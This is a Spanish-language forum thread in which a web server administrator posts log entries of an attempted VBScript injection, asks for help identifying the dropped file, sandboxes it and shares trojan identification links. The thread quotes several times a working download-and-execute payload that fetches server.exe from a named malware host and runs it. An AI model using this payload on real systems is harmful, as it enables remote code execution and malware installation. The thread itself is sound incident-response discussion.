Intentonas de colarme un malware en mi servidor web desde China

Iniciado por warcry., 12 Enero 2018, 19:26 PM

0 Miembros y 2 Visitantes están viendo este tema.

warcry.

bueno he tenido dos intentonas de ejecucion de codigo en el log del servidor

6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}


esa de las 6:12 de la mañana y otra a las 7:17

en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.

también la segunda intentona supongo que seria porque la primera no ha cuajado.

desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi

9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000


el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.

en principio creo que no, pero estoy con la mosca.

cuando tenga un poco de tiempo intento una conexión desde una shell de linux

en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor

thanx


HE SIDO BANEADO --- UN PLACER ---- SALUDOS

engel lex

Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}


no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

warcry.

Cita de: engel lex en 12 Enero 2018, 20:25 PM

no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban

en principio no tengo habilitada la opcion de ejecucion de scripts en el servidor, luego en teoria no deberia poder ejecutarse el "Wscript.Shell"

a parte he baneado todo el rango de ips del atacante 117.60.0.0 - 117.63.255.255

pero siempre te quedas con la mosca detrás de la oreja, por eso quería saber que hace exactamente el server.exe.

a ver si mañana por la mañana me pongo un rato y creo una sandbox.

esta noche si recibís desde mi ip ataques, recordad que igual soy un zombie, no soy yo  ;D
HE SIDO BANEADO --- UN PLACER ---- SALUDOS

warcry.

Bueno, hoy he estado haciendo mis pruebas.

he creado una sandbox y he ejecutado el archivo malicioso "server.exe" desde la ubicación teórica de descarga Shell.Run ("c:\server.exe")

teniendo en cuenta que no soy ningun experto en analisis de malware, mis impresiones generales son:

1. El archivo al ejecutarse permanece en el directorio, en este caso C: luego no se esconde.

2. El proceso se para facilmente desde el administrador de tareas luego no es pegajoso

3. Abre una conexion a la ip 202.124.205.33

server.exe 4244 TCP 192.168.226.132 49936 202.124.205.33 6380 SYN_SENT

4. Los datos de esa ip son:

Dirección IP: 202.124.205.33
AS Number (ASN): AS17553 Bogor Agricultural University
Organización: Bogor Agricultural University
Dominio:
DNS: 202.124.205.33
Pais: Indonesia
Código País: id
Bandera: Click para ver la bandera en grande
Nombre Región: Jawa Barat
País Original: Indonesia
Ciudad: Bekasi
Código ZIP: 17148
Diferencia Horaria: +07:00
Ips vinculadas: 202.124.205.33


El ataque provenía de una ip china, luego ese servidor de una universidad indonesia, podría ser un server comprometido y manejado por los chinos, para que directamente el troyano no les apunte a ellos.

En definitiva, a priori el ataque no ha tenido éxito, lo que no he conseguido reproducir es el log en mi servidor, lo que me tiene un poco mosca pero bueno. Creo que es un ataque que explota malas configuraciones de apache sobre windows server.

si algún experto se digna a analizar el bicho y aporta mas detalles se lo agradecería, parece un troyano en toda regla, pero como digo no soy conocedor del mundo del malware




HE SIDO BANEADO --- UN PLACER ---- SALUDOS

AXCESS

#4
Lamento si la información no le es útil (como el post es viejito).
No soy especialista u experto en virus (como solicita), pero sentí curiosidad e hice una investigación ligera. Esto fue lo que hallé:
Está en lo cierto es un Troyano  y básicamente lo que hace es generar puertas traseras para filtración / espionaje de información de manera cifrada.
Tiene otros nombres y variantes (familia).
Como corren tiempos escépticos, aquí le dejo los Link:

https://www.reasoncoresecurity.com/server.exe-8b21b109244582d1a0303506aad69e1330cafe79.aspx

"The executable server.exe has been detected as malware named Worm.Autorun.Spy.Agent."
"What does it do? Communicates with a remote host with strong encryption"
"Analysis date: 2/19/2018 9:36:51 PM UTC  (today)"

Corroborando funcionalidad.

https://www.superantispyware.com/malwarefiles/SERVER.EXE.html

"SERVER.EXE
Trojan.Agent/Gen-Backdoor"
"Trojan that may log user information and possibly block access to certain security related sites."

Hermano gemelo (puede tener el mismo nombre o su alternativo) (es un poco antigüa la información: ver):

https://greatis.com/blog/how-to/remove-server-runhosts-exe.htm

"SERVER\RUNHOSTS.EXE could also infect your computer by exploiting a security vulnerability of your Web browser or one of its plugins.
If this is the case, SERVER\RUNHOSTS.EXE would be injected into a Web page, and could get to your PC when you visited a malicious or hacked Web site."

Hubo otras fuentes, pero me parecen redundantes y ociosas.
Una vez más, lamento si le llega tarde o no le es útil la información.
Buenos deseos.


warcry.

gracias.

aunque la información que facilitas ya la tenia. pero te agradezco la ayuda

un saludo
HE SIDO BANEADO --- UN PLACER ---- SALUDOS